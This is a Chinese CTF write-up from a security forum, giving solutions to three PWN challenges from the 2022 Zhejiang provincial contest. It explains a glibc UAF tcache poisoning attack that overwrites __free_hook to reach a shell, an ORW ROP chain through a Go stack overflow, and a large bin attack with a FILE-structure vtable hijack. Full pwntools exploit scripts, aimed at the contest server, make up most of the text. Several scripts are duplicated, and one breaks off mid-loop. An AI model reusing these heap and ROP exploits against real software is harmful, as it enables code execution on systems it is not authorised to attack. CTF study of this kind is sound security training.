-
-
[原创]【2022浙江省赛】PWN题部分题解
-
发表于: 2022-9-29 23:43 16845
-
2.27的正常堆题
题目限制了add次数,只能add 7次,而且delet存在UAF占位 考虑UAF修改tcache chunk的key,使得无限free同一堆块填满tcache 溢出到UB,然后UAF leak libc 最后 UAF tcache poison 改free_hook 为one_gadget getshell
远程ld治好了的精神内耗
一道go语言栈溢出
发现连main函数入口都没有,简直逆不动(go语言的静态编译导致的elf本身就相当于c的libc,elf,ld等等的合集)
先简单测试一下,发现wsad分别对应了上下左右,输的话就可以直接走通迷宫:
然后紧接着应该是一个输入,测试测试有没有栈溢出,发现输入0x180个字节就报错了,并且rbp和rip是能被我们控制的
(ps:gdb调试设置好set follow-fork-mode parent和set detach-on-fork on才能不会因为system或exec这类函数卡死)
而且这个二进制文件里面的gadget非常的齐活,直接打ORW就好
省赛300分最难pwn题的含金量
2.34魔改(不知道魔改了啥,本地调试的话直接用2204的2.35即可)
看看main:
很直接的菜单,_exit一眼house,但是不知道啥house,看看delet发现有UAF,show和edit都很常规
而add用的是calloc:
想到了pig,但是pig打ORW有点不太好打,但是基本能确定large bin attack了
attack啥呢?我一开始先试试打top_chunk,但是不行,原因是attack最后有一个add大堆块的操作,这个操作会使得top_chunk的地址抬高,覆盖,没办法触发kiwi的链子。于是我现找了一个链子——puts的stdout(真是比赛现找的):
如果largebin attack劫持stdout为chunk P,并且满足P的pre_size为0x8000(这个可以用空间复用实现),最后rdi就会赋值为P的堆地址。再看看接下来的流程:
发现这个流程和flash_all_lock_up长得只有那么像了,当rdi+0x30,也就是堆地址+0xc0的位置为0并且堆地址+0xd8(vtable)的位置符合IO的虚表的地址范围,就会跳vtable+0x38的函数
常用的跳表有三种,pig的IO_str_jumps、emma的IO_cookie_jumps以及apple的IO_wfile_jumps。但是apple当时不会,pig被排除,所以只能试试cookie_jumps,还真成了,在结束前30分钟本地通了。但是。。。这个B玩意要扬fs:0x30,fs就牵扯到ld表,这个玩意本地和远程偏移太不一样了,导致痛失300分
第一种办法是爆破,参考wjh大佬的博客:https://blog.wjhwjhn.com/archives/593/
第二种是起一个有pwndbg的docker,把题目环境加载进去然后gdb fsbase获取偏移。这个起环境在github上有一个叫PWNdockerAll的项目,是pig007大佬写的,笔者在使用2204的过程中遇到了一点问题,自己鼓捣将install.sh稍作修改,使得它能够支持目前最新的2204版本(pig007大佬写的时候是2.34的2204,不兼容主要是因为python3.10的模块引用问题,那个时候python3.10好像还没出),现也在github上开源:
apple 常用的是IO_wfile_overflow,期望的是前面执行je
然后跳转到:
这里有啥好东西呢?发现有个和io_cookie_jumps一样的东西:
好家伙,就是只少一个point gurad,直接卡死我300分。。。可恶啊
夜深了,不想再调了,卷Glibc都是精神内耗。。。。
kiwi触发->malloc_assert->fxprintf->vfxprintf->locked_vfxprintf->vfprintf_internal->apple
这个做法需要一个堆溢出:
UAF+size存数组可实现堆溢出:
假定相邻堆块chunk1和chunk2,chunk2和top_chunk相邻。设定chunk1为0x430大小(题目大小),然后free进UB。add0x410,切割chunk1然后free chunk2,这时候,chunk1就和top_chunk相邻了,而且是0x420大小。由于我们数组存的是0x430大小,所以在edit的时候成功溢出0x10字节。可以改top_chunk的size打kiwi
puts触发->apple
(ps此exp非题目所给libc,题目给的是魔改的2.34版本的libc,我用的2204的libc在本地打的)
def
exp():
global
r
global
libc
##r=process('./babyheap')
r
=
remote(
"1.14.97.218"
,
24360
)
libc
=
ELF(
"./libc-2.27.so"
)
## leak_heap
add(
0x7f
)
add(
0x7f
)
##add(0x7f)
##add(0x7f)
delet(
0
)
edit(
0
,
"nameless"
)
##z()
show(
0
)
r.recvuntil(
"nameless"
)
heapbase
=
u64(r.recv(
6
).ljust(
8
,
"\x00"
))
-
0x10
log.success(
"heapbase:"
+
hex
(heapbase))
##leak libc
for
i
in
range
(
0
,
7
):
edit(
0
,p64(
0
)
*
2
)
delet(
0
)
##z()
show(
0
)
r.recvuntil(
"\n"
)
libcbase
=
u64(r.recv(
6
).ljust(
8
,
'\x00'
))
-
0x3ebca0
log.success(
"libcbase:"
+
hex
(libcbase))
## set_libc func
free_hook
=
libcbase
+
libc.sym[
"__free_hook"
]
system
=
libcbase
+
libc.sym[
"system"
]
edit(
0
,p64(free_hook))
add(
0x7f
)
##,"/bin/sh\x00")
add(
0x7f
)
##,p64(system))
edit(
3
,p64(system))
edit(
0
,
"/bin/sh\x00"
)
##z()
delet(
0
)
r.interactive()
def
exp():
global
r
global
libc
##r=process('./babyheap')
r
=
remote(
"1.14.97.218"
,
24360
)
libc
=
ELF(
"./libc-2.27.so"
)
## leak_heap
add(
0x7f
)
add(
0x7f
)
##add(0x7f)
##add(0x7f)
delet(
0
)
edit(
0
,
"nameless"
)
##z()
show(
0
)
r.recvuntil(
"nameless"
)
heapbase
=
u64(r.recv(
6
).ljust(
8
,
"\x00"
))
-
0x10
log.success(
"heapbase:"
+
hex
(heapbase))
##leak libc
for
i
in
range
(
0
,
7
):
edit(
0
,p64(
0
)
*
2
)
delet(
0
)
##z()
show(
0
)
r.recvuntil(
"\n"
)
libcbase
=
u64(r.recv(
6
).ljust(
8
,
'\x00'
))
-
0x3ebca0
log.success(
"libcbase:"
+
hex
(libcbase))
## set_libc func
free_hook
=
libcbase
+
libc.sym[
"__free_hook"
]
system
=
libcbase
+
libc.sym[
"system"
]
edit(
0
,p64(free_hook))
add(
0x7f
)
##,"/bin/sh\x00")
add(
0x7f
)
##,p64(system))
edit(
3
,p64(system))
edit(
0
,
"/bin/sh\x00"
)
##z()
delet(
0
)
r.interactive()
def
up():
r.sendline(
"w"
)
def
down():
r.sendline(
"s"
)
def
right():
r.sendline(
"d"
)
def
exp():
global
r
global
libc
##global elf
r
=
process(
'./pwn'
)
for
i
in
range
(
5
):
down()
for
i
in
range
(
3
):
right()
for
i
in
range
(
3
):
up()
for
i
in
range
(
3
):
right()
up()
right()
up()
up()
##z()
## gadgets
pop_rdi_ret
=
0x4008f6
pop_rsi_ret
=
0x40416f
pop_rdx_ret
=
0x51d4b6
pop_rax_ret
=
0x400a4f
syscall
=
0x4025ab
leave_ret
=
0x4015cb
bss
=
0xAD1600
+
0x500
pd1
=
flat(
pop_rax_ret ,
0
, pop_rdi_ret ,
0
, pop_rsi_ret , bss , pop_rdx_ret ,
0x210
,
syscall , leave_ret
)
##z()
r.sendlineafter(
"flag\x00"
,
0x178
*
"a"
+
p64(bss)
+
pd1)
flag_addr
=
bss
+
0x200
pd
=
flat(
0
, pop_rax_ret ,
2
, pop_rdi_ret , flag_addr , pop_rsi_ret ,
0
, pop_rdx_ret ,
0
,
syscall , pop_rax_ret ,
0
, pop_rdi_ret ,
3
, pop_rsi_ret , flag_addr , pop_rdx_ret ,
0x210
,
syscall ,pop_rax_ret ,
1
, pop_rdi_ret ,
1
, pop_rsi_ret , flag_addr , pop_rdx_ret ,
0x210
,
syscall ,
0xdeadbeef
).ljust(
0x200
,
"a"
)
+
"./flag\x00"
r.sendline(pd)
r.interactive()
def
up():
r.sendline(
"w"
)
def
down():
r.sendline(
"s"
)
def
right():
r.sendline(
"d"
)
def
exp():
global
r
global
libc
##global elf
r
=
process(
'./pwn'
)
for
i
in
range
(
5
):
down()
for
i
in
range
(
3
):
right()
for
i
in
range
(
3
):
up()
for
i
in
range
(
3
):
right()
up()
right()
up()
up()
##z()
## gadgets
pop_rdi_ret
=
0x4008f6
pop_rsi_ret
=
0x40416f
pop_rdx_ret
=
0x51d4b6
pop_rax_ret
=
0x400a4f
syscall
=
0x4025ab
leave_ret
=
0x4015cb
bss
=
0xAD1600
+
0x500
pd1
=
flat(
pop_rax_ret ,
0
, pop_rdi_ret ,
0
, pop_rsi_ret , bss , pop_rdx_ret ,
0x210
,
syscall , leave_ret
)
##z()
r.sendlineafter(
"flag\x00"
,
0x178
*
"a"
+
p64(bss)
+
pd1)
flag_addr
=
bss
+
0x200
pd
=
flat(
0
, pop_rax_ret ,
2
, pop_rdi_ret , flag_addr , pop_rsi_ret ,
0
, pop_rdx_ret ,
0
,
syscall , pop_rax_ret ,
0
, pop_rdi_ret ,
3
, pop_rsi_ret , flag_addr , pop_rdx_ret ,
0x210
,
syscall ,pop_rax_ret ,
1
, pop_rdi_ret ,
1
, pop_rsi_ret , flag_addr , pop_rdx_ret ,
0x210
,
syscall ,
0xdeadbeef
).ljust(
0x200
,
"a"
)
+
"./flag\x00"
r.sendline(pd)
r.interactive()
# -*- coding: utf-8 -*-
from
platform
import
libc_ver
from
pwn
import
*
from
hashlib
import
sha256
import
base64
context.log_level
=
'debug'
#context.arch = 'amd64'
context.arch
=
'amd64'
context.os
=
'linux'
rol
=
lambda
val, r_bits, max_bits: \
(val << r_bits
%
max_bits) & (
2
*
*
max_bits
-
1
) | \
((val & (
2
*
*
max_bits
-
1
)) >> (max_bits
-
(r_bits
%
max_bits)))
ror
=
lambda
val, r_bits, max_bits: \
((val & (
2
*
*
max_bits
-
1
)) >> r_bits
%
max_bits) | \
(val << (max_bits
-
(r_bits
%
max_bits)) & (
2
*
*
max_bits
-
1
))
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r=remote("123.57.69.203",7010)0xafa849b09b753ccd
##r=process('./sp1',env={"LD_PRELODA":"./libc-2.27.so"})
##mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
def
z():
gdb.attach(r)
def
cho(num):
r.sendlineafter(
">>"
,
str
(num))
def
add(sz,con):
cho(
1
)
r.sendlineafter(
"Size:"
,
str
(sz))
r.sendafter(
"content"
,con)
##r.sendlineafter("idx:",str(idx))
def
delet(idx):
cho(
2
)
r.sendlineafter(
"idx:"
,
str
(idx))
def
edit(idx,con):
cho(
3
)
r.sendlineafter(
"idx"
,
str
(idx))
r.sendafter(
"Content"
,con)
def
show(idx):
cho(
4
)
r.sendlineafter(
"idx"
,
str
(idx))
def
exp(x):
global
r
global
libc
##global elf
r
=
remote(
"1.14.97.218"
,
23023
)
##r=process('./pwn')
libc
=
ELF(
"./libc.so.6"
)
## fengshui
add(
0x418
,
"nameless"
)
add(
0x410
,
"nameless"
)
add(
0x410
,
"ymnhymnh"
)
add(
0x420
,
"x1ngx1ng"
)
add(
0x420
,
"nameless"
)
delet(
3
)
##delet(2)
## leak_libcbase
##z()
show(
3
)
r.recvuntil(
"\n"
)
libcbase
=
u64(r.recv(
6
).ljust(
8
,
"\x00"
))
-
0x1f2cc0
log.success(
"libcbase:"
+
hex
(libcbase))
add(
0x430
,
"nameless"
)
## set_libc_func
l_main
=
0x1f30b0
+
libcbase
free_hook
=
libcbase
+
libc.sym[
"__free_hook"
]
stdout
=
libcbase
+
libc.sym[
"stdout"
]
IO_str_jumps
=
libcbase
+
0x1f3b58
-
0x38
fsbase
=
libcbase
-
0x28c0
+
x
godget
=
libcbase
+
0x146020
##libcbase+0x1482ba
setcontext
=
libcbase
+
0x50bc0
## leak_heapbase
##z()
edit(
3
,
"x1ngx1ng"
+
"nameless"
)
##z()
show(
3
)
r.recvuntil(
"nameless"
)
heapbase
=
u64(r.recv(
6
).ljust(
8
,
"\x00"
))
-
0xef0
log.success(
"heapbase:"
+
hex
(heapbase))
key
=
heapbase
+
0x6b0
chunk1
=
heapbase
+
0x6b0
chunk2
=
heapbase
+
0xef0
##z()
## set_orw
open_addr
=
libcbase
+
libc.sym[
'open'
]
read_addr
=
libcbase
+
libc.sym[
'read'
]
write_addr
=
libcbase
+
libc.sym[
'write'
]
pop_rdi_ret
=
libcbase
+
0x2daa2
pop_rsi_ret
=
libcbase
+
0x37c0a
pop_rdx_pop_rbx_ret
=
libcbase
+
0x87729
ret
=
libcbase
+
0xecd6c
flag_addr
=
key
+
0x310
chain
=
flat(
pop_rdi_ret , flag_addr , pop_rsi_ret ,
0
, open_addr,
pop_rdi_ret ,
3
, pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret ,
0x100
,
0
, read_addr,
pop_rdi_ret ,
1
, pop_rsi_ret, flag_addr , pop_rdx_pop_rbx_ret,
0x100
,
0
,write_addr
).ljust(
0x100
,
'\x00'
)
+
'./flag\x00'
##large bin attack 2 yang point gurad
edit(
3
,p64(l_main)
*
2
+
p64(heapbase
+
0xef0
)
+
p64(fsbase
+
0x30
-
0x20
))
delet(
1
)
##z()
add(
0x430
,
"nameless"
)
##z()
edit(
3
,p64(chunk1)
+
p64(l_main)
+
p64(chunk1)
*
2
)
edit(
1
,p64(l_main)
+
p64(chunk2)
*
3
)
##z()
add(
0x410
,
"nameless"
)
##large in attack 2 ORW
edit(
3
,p64(l_main)
*
2
+
p64(heapbase
+
0xef0
)
+
p64(stdout
-
0x20
))
pd
=
0xb0
*
'a'
+
p64(
0
)
pd
=
pd.ljust(
0xc8
,
'a'
)
+
p64(IO_str_jumps)
pd
=
pd.ljust(
0xd0
,
"a"
)
+
p64(key
+
0x100
)
pd
=
pd.ljust(
0xe0
,
"a"
)
+
p64(rol(key ^ godget,
0x11
,
64
))
pd
=
pd.ljust(
0xf8
,
"a"
)
+
p64(key
+
0x130
)
pd
=
pd.ljust(
0x140
,
"a"
)
+
p64(setcontext
+
61
)
pd
=
pd.ljust(
0x1c0
,
"a"
)
+
p64(key
+
0x210
)
+
p64(ret)
pd
=
pd.ljust(
0x200
,
"a"
)
+
chain
edit(
7
,pd)
delet(
7
)
edit(
0
,
0x410
*
"a"
+
p64(
0x8000
))
##z()
cho(
1
)
r.sendlineafter(
"Size:"
,
str
(
0x430
))
##r.recvuntil("flag")
flag
=
"flag{"
+
r.recvuntil(
"\x00"
,drop
=
True
)
print
(flag)
r.interactive()
if
__name__
=
=
'__main__'
:
while
(
1
):
i
=
-
0x1000
if
i
=
=
0x1000
:
break
else
:
try
:
exp(i)
except
:
continue
##setcontext and orw
''''
orw=p64(r4)+p64(2)+p64(r1)+p64(free_hook+0x28)+p64(syscall)
orw+=p64(r4)+p64(0)+p64(r1)+p64(3)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
orw+=p64(r4)+p64(1)+p64(r1)+p64(1)+p64(r2)+p64(mem)+p64(r3)+p64(0x20)+p64(0)+p64(syscall)
orw+=p64(0xdeadbeef)
pd=p64(gold_key)+p64(free_hook)
pd=pd.ljust(0x20,'\x00')+p64(setcontext+61)+'./flag\x00'
pd=pd.ljust(0xa0,'\x00')+p64(free_hook+0xb0)+orw0xafa849b09b753ccd
r.sendafter(">>",pd)
flag=r.recvline()
'''
##orw
'''
##[+]: set libc func
IO_file_jumps=0x1e54c0+libcbase
IO_helper_jumps=0x1e4980+libcbase
setcontext=libcbase+libc.sym['setcontext']
open_addr=libcbase+libc.sym['open']
read_addr=libcbase+libc.sym['read']
puts_addr=libcbase+libc.sym['puts']
pop_rdi_ret=libcbase+0x2858f
pop_rsi_ret=libcbase+0x2ac3f
pop_rdx_pop_rbx_ret=libcbase+0x1597d6
ret=libcbase+0x26699
##[+]: large bin attack to reset TLS
##z()
##edit(4,p64(libcbase+0x1e4230)+)
##[+]: orw
flag_addr = heap_base + 0x4770 + 0x100
chain = flat(
pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_addr,
pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_addr,
pop_rdi_ret , flag_addr , puts_addr
).ljust(0x100,'\x00') + 'flag\x00'
'''
##banana
## b _dl_fini
## pwndbg> distance &_rtld_global &(_rtld_global._dl_ns._ns_loaded->l_next->l_next->l_next)
'''''
rop_chain = flat(pop_rdi_ret,bin_sh,ret,system_addr)
link_4_addr = heap_base + 0xcd0
fake_link_map = p64(0) + p64(0) + p64(0) + p64(link_4_addr)
fake_link_map += p64(magic) + p64(ret)
fake_link_map += p64(0)
fake_link_map += rop_chain
fake_link_map = fake_link_map.ljust(0xc8,'\0')
fake_link_map += p64(link_4_addr + 0x28 + 0x18) # RSP
fake_link_map += p64(pop_rdi_ret) # RCX RIP
fake_link_map = fake_link_map.ljust(0x100,'\x00')
fake_link_map += p64(link_4_addr + 0x10 + 0x110)*0x3
fake_link_map += p64(0x10)
fake_link_map = fake_link_map.ljust(0x31C - 0x10,'\x00')
fake_link_map += p8(0x8)
edit(1,'\0'*0x520+p64(link_4_addr + 0x20)) ##控prev_data
edit(2,fake_link_map)
'''
##pig
## p _IO_flush_all_lockp
''''
heap=heap+0x3b70
pd=p64(0)*3+p64(0x1c)+p64(0)+p64(heap)+p64(heap+26)
pd=pd.ljust(0xc8,b'\x00')
pd+=p64(_IO_str_jumps)
edit(3,pd)
'''
# -*- coding: utf-8 -*-
from
platform
import
libc_ver
from
pwn
import
*
from
hashlib
import
sha256
import
base64
context.log_level
=
'debug'
#context.arch = 'amd64'
context.arch
=
'amd64'
context.os
=
'linux'
rol
=
lambda
val, r_bits, max_bits: \
(val << r_bits
%
max_bits) & (
2
*
*
max_bits
-
1
) | \
((val & (
2
*
*
max_bits
-
1
)) >> (max_bits
-
(r_bits
%
max_bits)))
ror
=
lambda
val, r_bits, max_bits: \
((val & (
2
*
*
max_bits
-
1
)) >> r_bits
%
max_bits) | \
(val << (max_bits
-
(r_bits
%
max_bits)) & (
2
*
*
max_bits
-
1
))
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r=remote("123.57.69.203",7010)0xafa849b09b753ccd
##r=process('./sp1',env={"LD_PRELODA":"./libc-2.27.so"})
##mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
def
z():
gdb.attach(r)
def
cho(num):
r.sendlineafter(
">>"
,
str
(num))
def
add(sz,con):
cho(
1
)
r.sendlineafter(
"Size:"
,
str
(sz))
r.sendafter(
"content"
,con)
##r.sendlineafter("idx:",str(idx))
def
delet(idx):
cho(
2
)
r.sendlineafter(
"idx:"
,
str
(idx))
def
edit(idx,con):
cho(
3
)
r.sendlineafter(
"idx"
,
str
(idx))
r.sendafter(
"Content"
,con)
def
show(idx):
cho(
4
)
r.sendlineafter(
"idx"
,
str
(idx))
def
exp(x):
global
r
global
libc
##global elf
r
=
remote(
"1.14.97.218"
,
23023
)
##r=process('./pwn')
libc
=
ELF(
"./libc.so.6"
)
## fengshui
add(
0x418
,
"nameless"
)
add(
0x410
,
"nameless"
)
add(
0x410
,
"ymnhymnh"
)
add(
0x420
,
"x1ngx1ng"
)
add(
0x420
,
"nameless"
)
delet(
3
)
##delet(2)
## leak_libcbase
##z()
show(
3
)
r.recvuntil(
"\n"
)
libcbase
=
u64(r.recv(
6
).ljust(
8
,
"\x00"
))
-
0x1f2cc0
log.success(
"libcbase:"
+
hex
(libcbase))
add(
0x430
,
"nameless"
)
## set_libc_func
l_main
=
0x1f30b0
+
libcbase
free_hook
=
libcbase
+
libc.sym[
"__free_hook"
]
stdout
=
libcbase
+
libc.sym[
"stdout"
]
IO_str_jumps
=
libcbase
+
0x1f3b58
-
0x38
fsbase
=
libcbase
-
0x28c0
+
x
godget
=
libcbase
+
0x146020
##libcbase+0x1482ba
setcontext
=
libcbase
+
0x50bc0
## leak_heapbase
##z()
edit(
3
,
"x1ngx1ng"
+
"nameless"
)
##z()
show(
3
)
r.recvuntil(
"nameless"
)
heapbase
=
u64(r.recv(
6
).ljust(
8
,
"\x00"
))
-
0xef0
log.success(
"heapbase:"
+
hex
(heapbase))
key
=
heapbase
+
0x6b0
chunk1
=
heapbase
+
0x6b0
chunk2
=
heapbase
+
0xef0
##z()
## set_orw
open_addr
=
libcbase
+
libc.sym[
'open'
]
read_addr
=
libcbase
+
libc.sym[
'read'
]
write_addr
=
libcbase
+
libc.sym[
'write'
]
pop_rdi_ret
=
libcbase
+
0x2daa2
pop_rsi_ret
=
libcbase
+
0x37c0a
pop_rdx_pop_rbx_ret
=
libcbase
+
0x87729
ret
=
libcbase
+
0xecd6c
flag_addr
=
key
+
0x310
chain
=
flat(
pop_rdi_ret , flag_addr , pop_rsi_ret ,
0
, open_addr,
pop_rdi_ret ,
3
, pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret ,
0x100
,
0
, read_addr,
pop_rdi_ret ,
1
, pop_rsi_ret, flag_addr , pop_rdx_pop_rbx_ret,
0x100
,
0
,write_addr
).ljust(
0x100
,
'\x00'
)
+
'./flag\x00'
##large bin attack 2 yang point gurad
edit(
3
,p64(l_main)
*
2
+
p64(heapbase
+
0xef0
)
+
p64(fsbase
+
0x30
-
0x20
))
delet(
1
)
##z()
add(
0x430
,
"nameless"
)
##z()
edit(
3
,p64(chunk1)
+
p64(l_main)
+
p64(chunk1)
*
2
)
edit(
1
,p64(l_main)
+
p64(chunk2)
*
3
)
##z()
add(
0x410
,
"nameless"
)
##large in attack 2 ORW
edit(
3
,p64(l_main)
*
2
+
p64(heapbase
+
0xef0
)
+
p64(stdout
-
0x20
))
pd
=
0xb0
*
'a'
+
p64(
0
)
pd
=
pd.ljust(
0xc8
,
'a'
)
+
p64(IO_str_jumps)
pd
=
pd.ljust(
0xd0
,
"a"
)
+
p64(key
+
0x100
)
pd
=
pd.ljust(
0xe0
,
"a"
)
+
p64(rol(key ^ godget,
0x11
,
64
))
pd
=
pd.ljust(
0xf8
,
"a"
)
+
p64(key
+
0x130
)
pd
=
pd.ljust(
0x140
,
"a"
)
+
p64(setcontext
+
61
)
pd
=
pd.ljust(
0x1c0
,
"a"
)
+
p64(key
+
0x210
)
+
p64(ret)
pd
=
pd.ljust(
0x200
,
"a"
)
+
chain
edit(
7
,pd)
delet(
7
)
edit(
0
,
0x410
*
"a"
+
p64(
0x8000
))
##z()
cho(
1
)
r.sendlineafter(
"Size:"
,
str
(
0x430
))
##r.recvuntil("flag")
flag
=
"flag{"
+
r.recvuntil(
"\x00"
,drop
=
True
)
print
(flag)
r.interactive()
if
__name__
=
=
'__main__'
:
while
(
1
):
i
=
-
0x1000
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
赞赏
- 西湖论剑2024 IOT赛后复盘及mqtt rce详解 14699
- 对某嵌入式设备声波配网的研究 12068
- DAS10月月赛PWN出题心路&&CVE-2023-40930的介绍 11474
- [原创]关于Nokelock蓝牙锁破解分析 22123
- [原创]基于树莓派的蓝牙调试环境搭建 24613